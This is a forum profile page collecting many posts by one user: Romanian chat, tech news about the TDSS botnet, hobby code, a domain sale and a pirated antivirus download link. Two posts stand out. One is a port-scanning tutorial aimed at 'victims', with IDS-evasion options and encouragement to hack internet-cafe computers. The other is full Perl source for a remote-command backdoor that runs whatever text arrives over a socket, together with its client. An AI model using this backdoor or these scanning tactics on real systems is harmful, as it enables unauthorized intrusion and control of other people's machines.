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Everything posted by slacker

  1. Asa..deci ai 14 ani dupa cum vorbesti si dupa atitudinea ta.Eu vad ca la limba romana te descurci exceptional,scrii "romina",asa o cheama pe sora ta ? Si un sfat,foloseste internetul ca sa inveti engleza,hai ca stiu ca poti.
  2. slacker


    pacat ca are memorie video de 512 mb, hp pro brook
  3. slacker


    Laptop Asus K50ID-SX233V cu procesor Intel® CoreTM2 Duo T6500 2.1 GHz, 4GB, 500GB, NVIDIA GeForce GT 320M 1GB doar la 2000 lei,un super pret dupa parerea mea. il gasesti pe emag : link sau cele mai bune laptopuri sub 3.000 de lei : http://www.hit.ro/hardware/Cele-mai-bune-laptopuri-sub-3-000-de-lei
  4. Niciodata nu o sa se alieze upc cu rds ! Upc este o companie serioasa .
  5. tu esti chior sau te faci ?
  6. Scanning is the the process where a hacker will try to know something more about the computer or the site he/she is trying to attack. There are a lot of different ways to scan a victims computer and i will show below some of them and the programs used. 1- ANGRY IP Angry IP is a program that not only tries to scan a computer for open ports but that ATTEMPTS to connect to them and to the shared drives on the computer ... Download angry ip ( its free so google it ) and install it. The GUI of the program is quite simple to understand. If your are going to scan just one ip ex ( ) than range is from to . If you know some of the characters of the victims IP lets say for ex the first to series 120.0.xxx.xxx than range it from to ... that will scan all possible IP's through the internet that have that range. After the scan finishes you can see the open ports on your victim. Most common ports opened on a computer are : port 80 : http protocol port 21 : ftp protocol port 25 : smtp service ( email ) port 139 : windows shares there are also other ports but may vary from the application for example various games use big ports generally ranged from 3000 - 8000 depends on the game. Various internet applications like hamachi use ports like 17771 etc etc Than after the scan you can right-click on the ip and go to "connect to computer" which will try to connect to the victims computer ... the connection may vary depending on the firewall and windows setting the victim has. Ways to not make your drives hackble through angry ip and protect information ? : 1- host-based firewalls 2- restrict anonymous 3- blocked sharable drives ( C$ and ADMIN$ ) 4- restrict null sessions 2-LANGuard The LANguard application not only scans a target for open ports and services but has an integrated penetration testing feature that looks for weaknesses in the target operating system (OS) by running predefined scripts against the target. Google for the program, download it and install it. Than enter the IP or hostname of your victim and start the scan Fun part after the scan : If your target is not secure enough ( which is on 99 % of the cases where ppl only buy a pc to enter facebook ) the application may find several pieces of valuable information like the MAC address, the name of the currently logged in user, shared drives, users, network cards, and other things ... NOTE : if the target is running OS with old service packs, scripts included in LANGuard may identify the flaws during the scans directory traversal and the attacker depending on the flaw may do a dos attack which may later result in an easy exploitation of the victim and control over his pc ways to prevent yourself from getting hacked with LANGuard : 1- host based firewalls 2- blocked sharable drives 3- update OS with latest updates 3-FScan FScan is a tool from foundstone which is unique for scanning because it scans a victims pc in a "quiet" mode to avoid being detected from IDS's ( intrusion detection software ). FScan also allows scanning a certain port for ex port 80 ( which most firewalls keep unblocked ). From the fscan directory run a cmd and type fscan <options> (ip address) #port as options of fscan we have -i, which scans ports allowed by firewall of victim, -q which pings the vitcim before scanning, -r scans in a random order example a command would be fscan -qr ( you can put or not a port number its ur choice ) the scan will show the open ports in the target NOTE : older versions of FSCAN cannot scan port 23 because of a coding error of the program ways to not get scanned with fscan : 1- host-based firewalls 4-LanSpy LanSpy is an application that is used to scan computers within the LAN range. How can this become useful ? If you go in vacations in another city or state and you go in an internet cafe, computers there are connected in LAN and if you feel bored hack em XD ... despite of that ... LanSpy identifies information of victims in lan such as mac addresses, hosnames, operating systems, and other info ... Install LanSpy and enter target ip and click on green arrow to start. Results will be displayed showing all ports open. Note : LanSpy is the perfect tool to preform quick scans of a computer rather than slow programs ways to protect ? : 1- host-based firewalls 2- disable/uninstall unnecesary services 5-Netcat The netcat application has many uses; one is the ability to scan a target for open ports and services. Another utility, cryptcat, is almost identical except that it operates with encryption. to use from a prompt on netcat dir type the following command type : nc <options > <Hostname or IP Address> <Port Range> example : nc -v -r -w2 -z -1024 - The –v option instructs netcat to run in verbose mode, allowing you to see the progress of the scan. - The –r option instructs netcat to randomize local and remote ports in an attempt to elude any intrusion detection systems. - The –w2 option instructs netcat to wait 2 seconds between each port scanned to help elude any intrusion detection systems. - The –z option instructs netcat to operate in a zero-I/O (Input/Output) mode. It is best to use the –z when scanning with netcat. - The 1-1024 instructs netcat to scan port 1-1024. from a scan i did to a friend the results were - 80 (http) - 7 (Echo) - 13 (daytime) - 21 (FTP) - 17 (Quote of the Day) - 445 (Windows Share) - 9 (discard) - 139 (Windows Share) - 19 (Character Generator) - 135 (epmap) - 443 (HTTPS) - 25 (Simple Mail Transfer Protocol (SMTP) ports on interest here are 7, 13, 17, 9, and 19 since these ports are easy to launch a dos attack to ways to protect : 1- uninstall/disable unnecesary serivces 2- IDS 6-SuperScan SuperScan has the ability to discover which ports are open on the target. Identifying the open ports tells an attacker what ports are available for potential exploit. download and install the gui is simple to understand if u see careful through it so i wont go in detail enter victim IP and scan below the IP bar it will show a shared drive. Click on "port list setup" and you will see all open ports and services running on the victim. SuperScan by default will preform a banner grabbing too , which is the current program running that uses that port ... ways to protect : 1- secured firewall 2- bastion servers / workstations 3- secure access control list ( ACL ) OTHER PROGRAMS YOU MIGHT WANT TO TRY ARE : -TCS CGI Scanner -FTPScanner -WGateScan/ADM Gates
  7. Author:Semtex-Primed Server: #!/usr/bin/perl use IO::Socket; while(1) { my $sock = new IO::Socket::INET ( LocalHost => 'netbook1-linux', LocalPort => '8880', Proto => 'tcp', Listen => 1, Reuse => 1, ); die "\t\tCould not create socket: $!\n" unless $sock; my $new_sock = $sock->accept(); while () { print $_; $new_sock->recv($recv_data,1024); if($recv_data eq 'q' or $recv_data eq 'Q') { close $new_sock; } else { system("$recv_data"); last; } } # close($sock); } Exploiter client: #!/usr/bin/perl use IO::Socket; @header = ( "\n\n\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n", "\t\t|+| Exploiter 0.1a |+|\n", "\t\t|+| ~ Semtex-Primed ~ |+|\n" ); @options = ( "\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n", "\t\t|+| 1. Connect to server |+|\n", "\t\t|+| 2. Close |+|\n", "\t\t|+| |+|\n", "\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n" ); while(1) { system("clear"); print @header; print @options; print "\t\tWhat is your option? \n"; print "\t\t>>> "; $choice = ; chomp ($choice); if($choice eq "1") { my $sock = new IO::Socket::INET ( PeerAddr => 'netbook1-linux', PeerPort => '8880', Proto => 'tcp', ); die "\t\tCould not create socket: $!\n" unless $sock; print $sock "\t\tConnected!!\n"; while ($sock) { print "\t\tConnected, here's your choices\n"; print "\t\t1. Enter command\n"; print "\t\t2. quit\n"; print "\t\t>> "; $choice = ; chomp ($choice); if ($choice eq "2") { close($sock); exit($sock); last } elsif ($choice eq "1") { print "\t\tEnter Command! \n"; print "\t\t>> "; $data2send = ; chomp ($data2send); $sock->send($data2send); close $sock; last; } } } elsif($choice eq "2") { exit } }
  8. Author:ChronicCommand #!/usr/bin/python import socket, sys, string, time port = 6667 nick = "iSploit_bot" host = 'irc.darkscience.ws' name = "pwnz0r" channel = '#iexploit' ident = 'chronicz' woot = socket.socket() woot.connect ( (host, port) ) woot.send ( 'NICK ' + nick + '\r\n' ) woot.send ( 'USER ' + ident + ' ' + ident + ' ' + ident + ' :chroniczbot\r\n' ) while 1: data = woot.recv ( 1024 ) print(data) if data.find ( '376' ) != -1: woot.send( 'JOIN ' + channel + '\r\n' ) if data.find ( 'PING' ) != -1: woot.send( 'PONG ' + data.split() [1] + '\r\n') if data.find ( '!test' ) != -1: woot.send ("PRIVMSG #chroniccommand :Test message! \r\n") if data.fiind ( '!quit' ) != -1: woot.send ("QUIT\r\n") sys.exit()
  9. Imports System Imports System.IO Public Class Form1 Dim WordAndClue Dim word As String Dim clue As String Dim WordArray(0 To 99) As Char Dim CharacterStatus(0 To 99) As Boolean Dim Guesses As Integer Dim length As Integer Dim life As Integer Dim GuessedLetter As Char Dim difficultylevel As String Dim game(0 To length) As Boolean Dim wordlist(0 To 100) As String Dim currentline As String Dim words(0 To 999) As String Dim ListSize As Integer Dim hashposition As Integer Private Sub cmdNewGame_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdNewGame.Click picHangman.BackgroundImage = My.Resources.image1 lblWord.Text = "" life = 1 Guesses = 12 Call ButtonVisible() For i = 0 To 99 CharacterStatus(i) = False Next 'Choose a random number based on the ListSize 'Use the random number to access a line in the Array and place it in the WordAndClue variable hashposition = InStr(WordAndClue, "#") word = Microsoft.VisualBasic.Left(WordAndClue, hashposition - 1) clue = Microsoft.VisualBasic.Right(WordAndClue, Len(WordAndClue) - hashposition) MsgBox(clue) length = Len(word) For x = 1 To length WordArray(x) = Microsoft.VisualBasic.Mid(word, x, 1) Next For y = 1 To length lblWord.Text = lblWord.Text + "-" Next lblClue.Text = clue Call Difficulty() End Sub Private Sub Difficulty() If length < 5 Then difficultylevel = "Easy" lblDifficulty.Text = ("Difficulty = " + difficultylevel) ElseIf 10 > length > 5 Then difficultylevel = "Medium" lblDifficulty.Text = ("Difficulty = " + difficultylevel) ElseIf length > 10 Then difficultylevel = "Hard" lblDifficulty.Text = ("Difficulty = " + difficultylevel) End If End Sub Private Sub Guess() Dim GuessSuccessful As Boolean = False For z = 1 To length If WordArray(z) = GuessedLetter Then GuessSuccessful = True CharacterStatus(z) = True End If Next lblWord.Text = "" For h = 1 To length If CharacterStatus(h) = True Then lblWord.Text = lblWord.Text + WordArray(h) Else lblWord.Text = lblWord.Text + "-" End If Next If GuessSuccessful = False Then Guesses = Guesses - 1 life = life + 1 Call changelife() Call statuscheck() Else Call statuscheck() End If End Sub Private Sub statuscheck() If Guesses = 0 Then MsgBox("Gameover", , "Gameover") lblWord.Text = "" End If If lblWord.Text.Contains("-") Then Else MsgBox("Congratulations") If Guesses > My.Settings.highscore Then My.Settings.highscore = Guesses lblHighscore.Text = "Highscore: " + My.Settings.highscore Else lblHighscore.Text = "Highscore: " + My.Settings.highscore End If End If End Sub Private Sub changelife() If life = 1 Then picHangman.BackgroundImage = My.Resources.image1 ElseIf life = 2 Then picHangman.BackgroundImage = My.Resources.image2 ElseIf life = 3 Then picHangman.BackgroundImage = My.Resources.image3 ElseIf life = 4 Then picHangman.BackgroundImage = My.Resources.image4 ElseIf life = 5 Then picHangman.BackgroundImage = My.Resources.image5 ElseIf life = 6 Then picHangman.BackgroundImage = My.Resources.image6 ElseIf life = 7 Then picHangman.BackgroundImage = My.Resources.image7 ElseIf life = 8 Then picHangman.BackgroundImage = My.Resources.image8 ElseIf life = 9 Then picHangman.BackgroundImage = My.Resources.image9 ElseIf life = 10 Then picHangman.BackgroundImage = My.Resources.image10 ElseIf life = 11 Then picHangman.BackgroundImage = My.Resources.image11 ElseIf life = 12 Then picHangman.BackgroundImage = My.Resources.image12 End If End Sub Private Sub cmdW_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdW.Click cmdW.Visible = False GuessedLetter = "W" Call Guess() End Sub Private Sub cmdQ_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdQ.Click cmdQ.Visible = False GuessedLetter = "Q" Call Guess() End Sub Private Sub cmdE_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdE.Click cmdE.Visible = False GuessedLetter = "E" Call Guess() End Sub Private Sub cmdR_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdR.Click cmdR.Visible = False GuessedLetter = "R" Call Guess() End Sub Private Sub cmdT_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdT.Click cmdT.Visible = False GuessedLetter = "T" Call Guess() End Sub Private Sub cmdY_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdY.Click cmdY.Visible = False GuessedLetter = "Y" Call Guess() End Sub Private Sub cmdU_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdU.Click cmdU.Visible = False GuessedLetter = "U" Call Guess() End Sub Private Sub cmdI_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdI.Click cmdI.Visible = False GuessedLetter = "I" Call Guess() End Sub Private Sub cmdO_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdO.Click cmdO.Visible = False GuessedLetter = "O" Call Guess() End Sub Private Sub cmdP_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdP.Click cmdP.Visible = False GuessedLetter = "P" Call Guess() End Sub Private Sub cmdA_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdA.Click cmdA.Visible = False GuessedLetter = "A" Call Guess() End Sub Private Sub cmdS_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdS.Click cmdS.Visible = False GuessedLetter = "S" Call Guess() End Sub Private Sub cmdD_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdD.Click cmdD.Visible = False GuessedLetter = "D" Call Guess() End Sub Private Sub cmdF_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdF.Click cmdF.Visible = False GuessedLetter = "F" Call Guess() End Sub Private Sub cmdG_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdG.Click cmdG.Visible = False GuessedLetter = "G" Call Guess() End Sub Private Sub cmdH_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdH.Click cmdH.Visible = False GuessedLetter = "H" Call Guess() End Sub Private Sub cmdJ_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdJ.Click cmdJ.Visible = False GuessedLetter = "J" Call Guess() End Sub Private Sub cmdK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdK.Click cmdK.Visible = False GuessedLetter = "K" Call Guess() End Sub Private Sub cmdL_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdL.Click cmdL.Visible = False GuessedLetter = "L" Call Guess() End Sub Private Sub cmdZ_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdZ.Click cmdZ.Visible = False GuessedLetter = "Z" Call Guess() End Sub Private Sub cmdX_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdX.Click cmdX.Visible = False GuessedLetter = "X" Call Guess() End Sub Private Sub cmdC_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdC.Click cmdC.Visible = False GuessedLetter = "C" Call Guess() End Sub Private Sub cmdV_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdV.Click cmdV.Visible = False GuessedLetter = "V" Call Guess() End Sub Private Sub cmdB_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdB.Click cmdB.Visible = False GuessedLetter = "B" Call Guess() End Sub Private Sub cmdN_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdN.Click cmdN.Visible = False GuessedLetter = "N" Call Guess() End Sub Private Sub cmdM_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdM.Click cmdM.Visible = False GuessedLetter = "M" Call Guess() End Sub Private Sub ButtonVisible() cmdA.Visible = True cmdB.Visible = True cmdC.Visible = True cmdD.Visible = True cmdE.Visible = True cmdF.Visible = True cmdG.Visible = True cmdH.Visible = True cmdI.Visible = True cmdJ.Visible = True cmdK.Visible = True cmdL.Visible = True cmdM.Visible = True cmdN.Visible = True cmdO.Visible = True cmdP.Visible = True cmdQ.Visible = True cmdR.Visible = True cmdS.Visible = True cmdT.Visible = True cmdU.Visible = True cmdV.Visible = True cmdX.Visible = True cmdY.Visible = True cmdZ.Visible = True cmdW.Visible = True End Sub Private Sub cmdSetWord_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdAddWord.Click lstWords.Items.Add(txtWord.Text) lstClues.Items.Add(txtClue.Text) End Sub Private Sub cmdExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdExit.Click Me.Close() End Sub Private Sub cmdLoad_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdLoad.Click openlist.Filter = "Text files (*.TXT)|*.TXT" openlist.ShowDialog() If openlist.FileName "" Then Try FileOpen(1, openlist.FileName, OpenMode.Input) Do Until EOF(1) currentline = LineInput(1) lstWords.Items.Add(currentline) Loop Catch ex As Exception End Try End If End Sub Private Sub cmdLoadList_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdLoadList.Click openlist.Filter = "Text files (*.TXT)|*.TXT" openlist.ShowDialog() ListSize = 1 If openlist.FileName "" Then Try FileOpen(1, openlist.FileName, OpenMode.Input) Do Until EOF(1) currentline = LineInput(1) 'Put Current line of file into array WordAndClue(1) = LineInput(1) ListSize = ListSize + 1 Loop Catch ex As Exception End Try End If End Sub Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub End Class
  10. // Conversion - Program to convert temperature from Celcius Degrees into Fahrenheit: // Fahrenheit = Celcius * (212 -32)/100 + 32 #include #include #include using namespace std; int main(int nNumberofArgs, char* pszArgs[]) { // enter the temperature in Celsius int celcius; cout << "Enter the Temperature in Celsius:"; cin >> celcius; //calculate conversion factor for Celsius // to fahrenheit int factor; factor = 212 - 32; // use conversion factor to convert Celcius // into fahrenheit values int fahrenheit; fahrenheit = factor * celcius/100 + 32; // output the results (followed by a Newline) cout << "Fahrenheit value is:"; cout << fahrenheit << endl; // wait untul user is ready before terminating program // to allow the user to see the program results system("PAUSE"); return 0; }
  11. Vara asta UPC te cheama la revolutie! Da, ai auzit bine, la UPC internetul este gratuit! Alatura-te cauzei noastre si vino sa iti iei Internetul Fiber Power de 10 Mbps, GRATUIT la oricare dintre ofertele verii. Pentru mai multe detalii : Servicii Televiziune | Servicii Internet | Servicii Telefonie | UPC
  12. Dupa ce a petrecut sapte luni in stadiu de beta, versiunea finala a Yahoo Messenger a fost lansata oficial miercuri pentru platforma Windows. Update-ul include bug fix-uri si isi propune sa imbunatateasca stabilitatea generala a produsului. Cele mai noi feature-uri din Yahoo Messenger 11 includ abilitatea de a primi instantaneu update-uri sociale de la toti prietenii si contactele, indiferent de reteaua pe care se afla (twitter, facebook, flicker etc), direct din interfata Yahoo Messenger. Imbunatatirile din noua versiune, iti permit de asemenea sa postezi update-urile sociale, pe retele multiple, direct din Yahoo Messenger si sa chat-uiesti cu prietenii de pe Facebook. Un alt feature pe care userii il vor aprecia cu siguranta este abilitatea de a fi “available” in permanenta. Poti incepe o conversatie pe PC, pe care o poti continua ulterior pe iPhone, Android sau orice alt device conectat la Internet. Cateva poze :
  13. TDSS (cunoscut si sub numele de TDL) este un tip de malware foarte periculos, aflat in prezent in arsenalul infractorilor cibernetici. Caracteristicile acestuia permit autorilor sa creeze o retea botnet compusa din milioane de computere infectate din intreaga lume. In analiza „TDL4 – Top Bot”, expertii Kaspersky Lab estimeaza ca numarul PC-urilor compromise de acest program periculos depaseste 4,5 milioane, dintre care peste 80,000 se afla in Romania. Noul TDL-4 foloseste retele de tip peer-to-peer (P2P) pentru a controla computerele infectate, dar prezinta si functii care instaleaza servere proxy. Scopul pentru care acesta a fost creat este de a construi o retea de calculatoare-zombie (botnet) foarte bine ascunsa de competitori – infractori cibernetici care folosesc alte programe periculoase pentru a crea botnet-uri – si de companiile de securitate informatica, si care poate oferi acces la statiile infectate, chiar daca serverele de comanda si control sunt dezactivate. TDL-4 elimina aproximativ 20 de programe periculoase foarte populare, considerate competitoare, precum Gbot, ZeuS, Optima si multe altele. Asemenea versiunilor anterioare, TDL-4 se raspandeste, in principal, prin intermediul asa-numitelor programe de parteneriat cunoscute sub numele de „partnerka“ . Autorii malware-ului nu se ocupa ei insisi de extinderea botnet-ului, ci platesc alte persoane pentru aceasta activitate. In functie de termene si conditii, partenerii sunt platiti intre 20 si 200 USD pentru instalarea a 1000 de versiuni ale programului periculos. Statisticile Kaspersky Lab arata ca pentru o retea de peste 4,5 milioane de PC-uri si un pret cuprins intre sumele mentionate, infractorii cibernetici au cheltuit aproximativ 250.000 USD in trei luni pentru a crea o retea tip botnet formata din computere apartinand utilizatorilor americani. TDSS instaleaza pe un computer infectat aproximativ 30 de „utilitare”, inclusiv programe anti-virus false si sisteme pentru cresterea traficului publicitar si distributia de spam. Una dintre cele mai importante caracteristici a TDL-4 este capacitatea de a infecta sisteme de operare Windows pe 64 de biti. De asemenea, pentru controlul botnet-ului – pe langa serverele de comanda si control – este folosita pentru prima data reteaua publica pentru schimb de fisiere numita Kad. „Fara indoiala, dezvoltarea TDSS va continua”, spun autorii analizei „TDL4 – Top Bot”. „Malware-ul si botnet-urile vor crea neplaceri atat pentru utilizatori, cat si pentru specialistii in securitate IT. Actualizarile constante in codul TDL-4, rootkit-urile pentru sisteme de operare pe 64 de biti, folosirea de exploit-uri din arsenalul Stuxnet, utilizarea tehnologiilor P2P, „anti-virusul” proprietar si multe alte caracteristici fac din TDSS unul dintre mai avansate si greu de analizat programe periculoase ale momentului”, incheie acestia. pentru specialistii in securitate IT. Actualizarile constante in codul TDL-4, rootkit-urile pentru sisteme de operare pe 64 de biti, folosirea de exploit-uri din arsenalul Stuxnet, utilizarea tehnologiilor P2P, „anti-virusul” proprietar si multe alte caracteristici fac din TDSS unul dintre mai avansate si greu de analizat programe periculoase ale momentului”, incheie acestia. Sursa
  14. http://dark-arena.ro/ Vand domeniul dark-arena.ro pe 5euro paypal ! Contact: radu96_x
  15. AVG Internet Security 2011 10.0.1388 Build 3717 Multilingual (x86/x64) | 175/196 Mb Complete protection for everything you do! With AVG Internet Security, our most advanced protection, you get a worry-free online experience every time. This award-winning product gives you unbeatable Internet security by protecting against viruses, spyware, hackers, spam and malicious websites. AVG Internet Security is a reliable and easy-to-use solution for home and small office users which is trusted by millions of users worldwide. AVG Internet Security's multiple layers of protection mean you don't have to worry about identity theft, spam or viruses. And it'll even prevent you from accidentally visiting harmful sites. It's faster, smarter security that won't slow your computer down. With AVG Internet Security you also have access for the first time to AVG Identity Theft Recovery Unit that will help you get your life back in order if you ever become a victim of identity theft – online or offline. Unique Internet security thanks to new technology - Only AVG gives you real-time protection against malicious websites thanks to our new LinkScanner technology. • Safely bank and shop online without fear of identity theft thanks to AVG's new Identity Protection technology • Surf, and search with confidence, with LinkScanner® checking web pages at the only time that matters - right before you click that link Additionally, Internet Security 9.0 pulls together elements of AVG’s firewall, identity protection, and anti-virus signature detection capabilities to deliver the most accurate detection of new and unknown threats. This enhanced protection level makes use of cutting-edge technologies like application white-listing and “in-the-cloud” automated testing for tell-tale signs that indicate the presence of a new threat. When you install AVG Internet Security, every one of these features is fully-functional - there's no need to do a thing. Banking and shopping online • AVG Identity Protection - Keeps your private information safe from known and unknown threats • NEW Enhanced Firewall - Prevents hackers from seeing inside your computer Surfing and searching the web, social networking • LinkScanner® Active Surf-Shield - Ensures every web page you visit is safe – even before you go there • LinkScanner® Search-Shield - Applies safety ratings to your Google, Bing/MSN and Yahoo search results • NEW Superior Phishing Protection - Checks to make sure web pages really are what they appear to be Emailing, chatting, and downloading NEW Enhanced Anti-Spam - Blocks spammers and scammers from clogging your system Web Shield - Lets you download and exchange files without risking virus infections E-mail Scanner - Keeps you safe from dangerous attachments and links in your e-mail Whether you’re online or offline • Anti-Virus - Makes sure you can’t get or spread a virus, worm, or Trojan horse • Anti-Spyware - Prevents unauthorized information access by spyware and adware • Anti-Rootkit - Ensures even the toughest and most sophisticated threats are kept out of your PC • Game Mode - Keeps you safe without interrupting your Game-play • Update Manager - Makes sure you’re always protected against the latest threats – automatically • System Tools - Lets you customize how AVG protection works with your system Download:Download AVG.Internet.Security.2011.1388.3717.x86.rar for free on Filesonic.com x64:Download AVG.Internet.Security.2011.1388.3717.x64.rar for free on Filesonic.com
  16. Delete undeletable files far? nici un soft 1) Crea?i un folder numit “Windows.old” 2) Mutarea fi?ierelor care nu pot fi ?terse în acel folder 3) Rula?i Cur??ire disc în Start – Toate Program – Accesorii – System Tools (sau c?utare în meniul Start) 4) Alege?i partitia în care folderull Windows.old se afl? ?i face?i clic pe OK. 5) Bifati?i “anterioar? Windows Instala?ii” casu?? ?i face?i clic pe OK
  17. slacker


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